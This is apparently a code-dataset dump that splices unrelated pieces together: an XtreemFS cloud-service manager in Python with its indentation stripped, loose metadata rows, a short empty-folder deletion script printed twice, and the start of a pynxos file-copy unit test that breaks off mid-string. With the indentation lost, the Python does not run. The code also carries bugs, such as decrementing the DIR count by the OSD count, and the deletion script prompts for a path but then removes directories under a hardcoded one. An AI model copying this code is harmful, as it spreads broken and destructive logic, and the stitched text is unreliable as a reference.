# TODO: currently not used
def KillOsd(self, nodes):
for node in nodes:
client.stopOSD(node.ip, 5555)
self.osdNodes.remove(node)
def _do_add_nodes(self, nr_dir, nr_mrc, nr_osd, cloud, resuming=False):
startCloud = self._init_cloud(cloud)
totalNodes = nr_dir + nr_mrc + nr_osd
# try to create totalNodes new nodes
try:
node_instances = self.controller.create_nodes(totalNodes,
client.check_agent_process, 5555, startCloud)
except:
self.logger.exception('_do_add_nodes: Failed to request a new node')
self.state = self.S_STOPPED
return
self.nodes += node_instances
dirNodesAdded = node_instances[:nr_dir]
self.dirNodes += dirNodesAdded
mrcNodesAdded = node_instances[nr_dir:nr_mrc+nr_dir]
self.mrcNodes += mrcNodesAdded
osdNodesAdded = node_instances[nr_mrc+nr_dir:]
self.osdNodes += osdNodesAdded
# TODO: maybe re-enable when OSD-removal moves data to another node before shutting down the service.
#KilledOsdNodes = []
# The first node will contain the OSD service so it will be removed
# from there
#if nr_osd > 0 and self.osdCount == 0:
# KilledOsdNodes.append(self.dirNodes[0])
#self.KillOsd(KilledOsdNodes)
# Startup DIR agents
for node in dirNodesAdded:
client.startup(node.ip, 5555)
data = client.createDIR(node.ip, 5555)
self.logger.info('Received %s from %s', data, node.id)
self.dirCount += 1
# Startup MRC agents
for node in mrcNodesAdded:
client.startup(node.ip, 5555)
data = client.createMRC(node.ip, 5555, self.dirNodes[0].ip)
self.logger.info('Received %s from %s', data, node.id)
self.mrcCount += 1
# Startup OSD agents (if not resuming)
if not resuming:
self._start_osd(osdNodesAdded, startCloud)
self.osdCount += len(osdNodesAdded)
#for node in osdNodesAdded:
# client.startup(node.ip, 5555)
# data = client.createOSD(node.ip, 5555, self.dirNodes[0].ip)
# self.logger.info('Received %s from %s', data, node.id)
# self.osdCount += 1
self.state = self.S_RUNNING
return HttpJsonResponse()
@expose('GET')
def list_nodes(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to list_nodes')
return HttpJsonResponse({
'dir': [node.id for node in self.dirNodes ],
'mrc': [node.id for node in self.mrcNodes],
'osd': [node.id for node in self.osdNodes]
})
@expose('GET')
def get_service_info(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
return HttpJsonResponse({
'state': self.state,
'type': 'xtreemfs',
'persistent': self.persistent,
'osd_volume_size': self.osd_volume_size
})
@expose('GET')
def get_node_info(self, kwargs):
if 'serviceNodeId' not in kwargs:
return HttpErrorResponse('ERROR: Missing arguments')
serviceNodeId = kwargs.pop('serviceNodeId')
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse('ERROR: Invalid arguments')
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'dir': serviceNode in self.dirNodes,
'mrc': serviceNode in self.mrcNodes,
'osd': serviceNode in self.osdNodes
}
})
@expose('POST')
def remove_nodes(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to remove_nodes')
nr_dir = 0
nr_mrc = 0
nr_osd = 0
# Removing DIR Nodes
if 'dir' in kwargs:
if not isinstance(kwargs['dir'], int):
return invalid_arg('Expected an integer value for "dir"')
nr_dir = int(kwargs.pop('dir'))
if nr_dir < 0:
return invalid_arg('Expected a positive integer value for "dir"')
if nr_dir > self.dirCount - 1: # we need at least 1 DIR
return invalid_arg('Cannot remove_nodes that many DIR nodes')
# Removing MRC nodes
if 'mrc' in kwargs:
if not isinstance(kwargs['mrc'], int):
return invalid_arg('Expected an integer value for "mrc"')
nr_mrc = int(kwargs.pop('mrc'))
if nr_mrc < 0:
return invalid_arg('Expected a positive integer value for "mrc"')
if nr_mrc > self.mrcCount - 1: # we need at least 1 MRC
return invalid_arg('Cannot remove_nodes that many MRC nodes')
# TODO: 'osd' is no longer required, when removing other services is supported
if not 'osd' in kwargs:
return HttpErrorResponse('ERROR: Required argument doesn\'t exist')
if not isinstance(kwargs['osd'], int):
return HttpErrorResponse(
'ERROR: Expected an integer value for "osd"')
nr_osd = int(kwargs.pop('osd'))
if nr_osd < 0:
return invalid_arg('Expected a positive integer value for "osd"')
if nr_osd > self.osdCount - 1: # we need at least 1 OSD
return invalid_arg('Cannot remove_nodes that many OSD nodes')
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[nr_dir, nr_mrc, nr_osd]).start()
return HttpJsonResponse()
def _do_remove_nodes(self, nr_dir, nr_mrc, nr_osd):
# NOTE: the logically unremovable first node which contains all
# services is ignored by using 1 instead of 0 in:
# for _ in range(0, nr_[dir|mrc|osd]):
# node = self.[dir|mrc|osd]Nodes.pop(1)
if nr_dir > 0:
for _ in range(0, nr_dir):
node = self.dirNodes.pop(1)
self._stop_dir([node], remove=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
self.dirCount -= nr_osd
if nr_mrc > 0:
for _ in range(0, nr_mrc):
node = self.mrcNodes.pop(1)
self._stop_mrc([node], remove=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
self.mrcCount -= nr_mrc
if nr_osd > 0:
for _ in range(0, nr_osd):
node = self.osdNodes.pop(1)
self._stop_osd([node], remove=True, drain=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
self.osdCount -= nr_osd
self.state = self.S_RUNNING
# TODO: maybe re-enable when OSD-removal moves data to another node before shutting down the service.
# if there are no more OSD nodes we need to start OSD service on the
# DIR node
#if self.osdCount == 0:
# self.osdNodes.append(self.dirNodes[0])
# self._start_osd(self.dirNodes)
return HttpJsonResponse()
@expose('POST')
def createMRC(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create MRC service')
# Just createMRC from all the agents
for node in self.nodes:
data = client.createMRC(node.ip, 5555, self.dirNodes[0].ip)
self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createDIR(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create DIR service')
# Just createDIR from all the agents
for node in self.nodes:
data = client.createDIR(node.ip, 5555)
self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createOSD(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create OSD service')
# Just createOSD from all the agents
for node in self.nodes:
data = client.createOSD(node.ip, 5555, self.dirNodes[0].ip)
self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createVolume(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create Volume')
if not 'volumeName' in kwargs:
return HttpErrorResponse(
'ERROR: Required argument (volumeName) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
# Get the value of 'owner', if specified. 'xtreemfs' otherwise
owner = kwargs.pop('owner', 'xtreemfs')
args = [ 'mkfs.xtreemfs',
'%s:32636/%s' % (self.mrcNodes[0].ip, volumeName),
"-u", owner,
"-g", owner,
"-m", "777" ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to create volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume could not be created")
self.logger.info('Creating Volume: %s; %s', stdout, stderr)
return HttpJsonResponse()
@expose('POST')
def deleteVolume(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to delete Volume')
if not 'volumeName' in kwargs:
return HttpErrorResponse(
'ERROR: Required argument (volumeName) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
args = [ 'rmfs.xtreemfs',
'-f',
'%s:32636/%s' % (self.mrcNodes[0].ip, volumeName) ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to delete volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume could not be deleted")
self.logger.info('Deleting Volume: %s; %s', stdout, stderr)
# TODO(maybe): issue xtfs_cleanup on all OSDs to free space (or don't and assume xtfs_cleanup is run by a cron job or something)
return HttpJsonResponse()
@expose('GET')
def listVolumes(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to view volumes')
args = [ 'lsfs.xtreemfs', self.mrcNodes[0].ip + ':32636' ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to view volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume list cannot be accessed")
return HttpJsonResponse({ 'volumes': stdout })
# NOTE: see xtfsutil for the available policies
@expose('GET')
def list_striping_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "RAID0" })
@expose('GET')
def list_replication_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "ronly, WaR1, WqRq" })
@expose('GET')
def list_osd_sel_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "DEFAULT, FQDN, UUID, DCMAP, VIVALDI" })
@expose('GET')
def list_replica_sel_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "DEFAULT, FQDN, DCMAP, VIVALDI" })
def set_policy(self, volumeName, policyName, args):
mountPoint = '/tmp/' + volumeName
# mkdir -p <mountpoint>
process = subprocess.Popen(['mkdir', '-p', mountPoint])
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# mount.xtreemfs <dir_ip>:32638/<volumename> <mountpoint>
process = subprocess.Popen(['mount.xtreemfs',
'%s:32638/%s' % (self.dirNodes[0].ip, volumeName),
mountPoint],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# # with python 2.7
# try:
# # mkdir -p <mountpoint>
# subprocess.check_output(['mkdir', '-p', mountPoint])
# # mount.xtreemfs <dir_ip>:32638/<volumename> <mountpoint>
# subprocess.check_output(['mount.xtreemfs',
# '%s:32638/%s' % (self.dirNodes[0].ip, volumeName),
# mountPoint],
# stdout=subprocess.STDOUT)
# except subprocess.CalledProcessError as e:
# return HttpErrorResponse('ERROR: could not mount volume: ' + e.output)
# xtfsutil <mountpoint> args
process = subprocess.Popen(['xtfsutil', mountPoint] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout_xtfsutil, stderr_xtfsutil) = (stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# umount <mountpoint>
process = subprocess.Popen(['umount', mountPoint],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# rmdir <mountpoint>
process = subprocess.Popen(['rmdir', mountPoint])
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# # with python 2.7
# try:
# # umount <mountpoint>
# subprocess.check_output(['umount', mountPoint])
# # fusermount -u <mountpoint>
# #subprocess.check_output(['fusermount', '-u', mountPoint])
# # rmdir <mountpoint>
# subprocess.check_output(['rmdir', mountPoint])
# except subprocess.CalledProcessError as e:
# return HttpErrorResponse('ERROR: could not unmount volume: ' + e.output)
self.logger.info('Setting %s policy: %s; %s', policyName, stdout_xtfsutil, stderr_xtfsutil)
return HttpJsonResponse({ 'stdout': stdout_xtfsutil })
@expose('POST')
def set_osd_sel_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set OSD selection policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
# xtfsutil <path> --set-osp <policy>
args = [ '--set-osp', policy ]
return self.set_policy(volumeName, 'OSD selection', args)
@expose('POST')
def set_replica_sel_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Replica selection policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
# xtfsutil <path> --set-rsp <policy>
args = [ '--set-rsp', policy ]
return self.set_policy(volumeName, 'Replica selection', args)
@expose('POST')
def set_replication_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Replication policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
if not 'factor' in kwargs:
return HttpErrorResponse('ERROR: Required argument (factor) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
factor = kwargs.pop('factor')
# xtfsutil <path> --set-drp --replication-policy <policy> --replication-factor <factor>
args = [ '--set-drp',
'--replication-policy', policy,
'--replication-factor', factor ]
return self.set_policy(volumeName, 'Replication', args)
@expose('POST')
def set_striping_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Striping policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
if not 'width' in kwargs:
return HttpErrorResponse('ERROR: Required argument (factor) doesn\'t exist')
if not 'stripe-size' in kwargs:
return HttpErrorResponse('ERROR: Required argument (stripe-size) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
width = kwargs.pop('width')
stripe_size = kwargs.pop('stripe-size')
# xtfsutil <path> --set-dsp --striping-policy <policy> --striping-policy-width <width> --striping-policy-stripe-size <stripe-size>
args = [ '--set-dsp',
'--striping-policy', policy,
'--striping-policy-width', width,
'--striping-policy-stripe-size', stripe_size ]
return self.set_policy(volumeName, 'Striping', args)
@expose('POST')
def toggle_persistent(self, kwargs):
self.persistent = not self.persistent
self.logger.debug('toggle_persistent: %s' % self.persistent)
return self.get_service_info({})
@expose('POST')
def set_osd_size(self, kwargs):
if not 'size' in kwargs:
return HttpErrorResponse("ERROR: Required argument (size) doesn't exist")
try:
self.osd_volume_size = int(kwargs['size'])
self.logger.debug('set_osd_size: %s' % self.osd_volume_size)
return self.get_service_info({})
except ValueError:
return HttpErrorResponse("ERROR: Required argument (size) should be an integer")
@expose('POST')
def get_service_snapshot(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse(
'ERROR: Wrong state to get service snapshot.')
self.state = self.S_EPILOGUE
# stop all agent services
self.logger.debug("Stopping all agent services")
self._stop_all(remove=False)
self.logger.debug("Calling get_snapshot on agents")
# dictionary mapping node IDs to tuples of uuids/None (DIR, MRC, OSD)
nodes_snapshot = {}
for node in self.nodes:
if node.id not in nodes_snapshot:
nodes_snapshot[node.id] = {
'data': None,
'dir_uuid': self.dir_node_uuid_map.get(node.id),
'mrc_uuid': self.mrc_node_uuid_map.get(node.id),
'osd_uuid': self.osd_node_uuid_map.get(node.id)
}
try:
# get snapshot from this agent node, independent of what
# XtreemFS services are running there
data = client.get_snapshot(node.ip, 5555)
self.logger.debug('get_snapshot(%s) HTTP code: %s' % (node.ip,
data[0]))
nodes_snapshot[node.id]['data'] = base64.b64encode(data[1])
except client.AgentException:
self.logger.exception('Failed to get snapshot from node %s' %
node)
self.state = self.S_ERROR
raise
# Get ID of attached volume
volume_id = self.osd_uuid_volume_map.get(
nodes_snapshot[node.id]['osd_uuid'])
nodes_snapshot[node.id]['volume'] = volume_id
if volume_id:
volume = self.get_volume(volume_id)
nodes_snapshot[node.id]['cloud'] = volume.cloud.cloud_name
for key in 'dir_uuid', 'mrc_uuid', 'osd_uuid', 'volume':
self.logger.debug("nodes_snapshot[%s]['%s']: %s" % (node.id,
key, nodes_snapshot[node.id][key]))
self.logger.debug("Shutting all agents down")
self._do_shutdown(stop_services=False)
return HttpJsonResponse(nodes_snapshot.values())
@expose('POST')
def set_service_snapshot(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse(
'ERROR: Wrong state to set service snapshot.')
if not 'nodes' in kwargs:
return HttpErrorResponse(
"ERROR: Required argument (nodes) doesn't exist")
nodes = kwargs['nodes']
if len(nodes) != len(self.nodes):
err = "set_service_snapshot: len(nodes) != len(self.nodes)"
self.logger.error(err)
return HttpErrorResponse(err)
self.logger.info("set_service_snapshot: stopping all agent services")
# rewriting state
self.osdNodes = []
self.mrcNodes = []
self.dirNodes = []
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
self.osd_uuid_volume_map = {}
for node, data in zip(self.nodes, nodes):
volumeid = data.get('volume')
osd_uuid = data.get('osd_uuid')
mrc_uuid = data.get('mrc_uuid')
dir_uuid = data.get('dir_uuid')
# If this is a dir node
if dir_uuid:
self.dir_node_uuid_map[node.id] = dir_uuid
self.dirNodes.append(node)
# If this is a mrc node
if mrc_uuid:
self.mrc_node_uuid_map[node.id] = mrc_uuid
self.mrcNodes.append(node)
# If this is an OSD node
if osd_uuid:
self.osd_node_uuid_map[node.id] = osd_uuid
self.osdNodes.append(node)
if volumeid:
self.osd_uuid_volume_map[osd_uuid] = volumeid
try:
self.get_volume(volumeid)
except Exception:
# This volume is not in the list of known ones.
volumeCloud = self._init_cloud(data.get('cloud'))
class volume:
id = volumeid
cloud = volumeCloud
self.volumes.append(volume)
# Regardless of node type, restore metadata
try:
self.logger.info('set_service_snapshot: restoring %s' %
node.ip)
data = client.set_snapshot(node.ip, 5555, data['archive'])
except client.AgentException, err:
self.logger.exception(err)
raise err
self.logger.info("set_service_snapshot: starting all agent services")
self._start_all()
self.logger.info("set_service_snapshot: all agent services started")
return HttpJsonResponse()
| 32,779
| 4,876
| 46
|
a3c424cf728d4c2ef3a50ff9cfcd26a82c1360fa
| 505
|
py
|
Python
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 50
|
2020-09-19T16:40:21.000Z
|
2022-02-05T05:48:42.000Z
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 266
|
2020-09-25T17:24:04.000Z
|
2021-11-29T07:17:57.000Z
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 113
|
2020-09-26T10:28:11.000Z
|
2021-10-15T06:58:53.000Z
|
import os
import sys
# enter path to the directory with the files
x = input('Absolute path of folder, from which empty subfolders are to be removed: ')
# check if path is valid
if not os.path.exists(x):
print('Invalid path\nTerminating program')
sys.exit()
# cleanup of empty subfolders
walk = list(os.walk('/home/naman/Desktop/del_folders/folder_struct'))
for path, folders, files in walk:
if (len(folders) == 0) and (len(files) == 0):
os.rmdir(path)
print(f'Removed empty directory: {path}')
| 26.578947
| 85
| 0.720792
|
import os
import sys
# enter path to the directory with the files
x = input('Absolute path of folder, from which empty subfolders are to be removed: ')
# check if path is valid
if not os.path.exists(x):
print('Invalid path\nTerminating program')
sys.exit()
# cleanup of empty subfolders
walk = list(os.walk('/home/naman/Desktop/del_folders/folder_struct'))
for path, folders, files in walk:
if (len(folders) == 0) and (len(files) == 0):
os.rmdir(path)
print(f'Removed empty directory: {path}')
| 0
| 0
| 0
|
0a5858e6445232a1bc20db7f822c0cac94845b29
| 21,764
|
py
|
Python
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 14
|
2016-04-17T19:03:15.000Z
|
2021-04-06T13:04:23.000Z
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 8
|
2016-02-02T23:44:12.000Z
|
2019-02-15T20:20:20.000Z
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 17
|
2016-04-17T19:03:17.000Z
|
2021-04-05T09:55:43.000Z
|
import unittest
import mock
from tempfile import NamedTemporaryFile
from pynxos.features.file_copy import FileCopy, FileTransferError
if __name__ == "__main__":
unittest.main()
| 91.445378
| 3,856
| 0.66826
|
import unittest
import mock
from tempfile import NamedTemporaryFile
from pynxos.features.file_copy import FileCopy, FileTransferError
class FileCopyTestCase(unittest.TestCase):
@mock.patch('pynxos.device.Device', autospec=True)
def setUp(self, mock_device):
self.device = mock_device
self.device.host = 'host'
self.device.username = 'user'
self.device.password = 'pass'
self.fc = FileCopy(self.device, '/path/to/source_file')
def test_init(self):
self.assertEqual(self.fc.device, self.device)
self.assertEqual(self.fc.src, '/path/to/source_file')
self.assertEqual(self.fc.dst, 'source_file')
self.assertEqual(self.fc.port, 22)
self.assertEqual(self.fc.file_system, 'bootflash:')
def test_get_remote_size(self):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes used\n19439792128 bytes free\n21865418752 bytes total\n'
result = self.fc.get_remote_size()
expected = 19439792128
self.assertEqual(result, expected)
self.device.show.assert_called_with('dir bootflash:', raw_text=True)
@mock.patch('os.path.getsize')
def test_enough_space(self, mock_getsize):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 